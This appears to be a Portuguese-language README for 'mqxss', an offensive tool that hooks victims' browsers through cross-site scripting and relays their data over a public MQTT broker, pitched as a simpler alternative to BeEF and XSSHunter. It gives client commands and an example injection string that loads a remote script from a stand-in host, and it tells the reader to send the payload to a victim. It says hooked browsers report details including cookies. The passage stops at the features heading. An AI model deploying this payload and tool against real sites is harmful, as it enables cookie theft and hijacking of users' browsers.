
Comunicação de navegador hooked via MQTT

A vantagem de usar isto em vez do beef ou xsshunter é que, além de hospedar o payload js, não há configuração de infraestrutura; você pode usar um broker público (no entanto, atualmente usa ofuscação; criptografia está em andamento).
Os navegadores hookados se comunicarão no tópico MQTT no broker que você especificar; existem muitos brokers públicos/gratuitos para testar isso.
O cliente utiliza a biblioteca python paho.mqtt, enquanto o payload js utiliza 'mqttws31.min.js', que ele obtém daqui 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js'.

Para gerar um payload JS para colocar hook em navegadores, defina a flag -g em tempo de execução juntamente com as variáveis de broker, porta e tópico. Isso criará seu payload na pasta /js/.
Para executar o cliente, forneça seu broker, porta e tópico da seguinte forma:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname
Para executar o cliente com credenciais, forneça seu broker, porta, nome de usuário, senha e tópico da seguinte forma:
mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password
Envie seu payload XSS para a vítima enquanto o cliente mqxss está em execução, ex.: '"><script src=https://example.com/x.js async></script> ou algo semelhante; se vulnerável, você deve receber uma notificação informando que o navegador se conectou com alguns detalhes básicos, incluindo cookies etc.

Funcionalidades: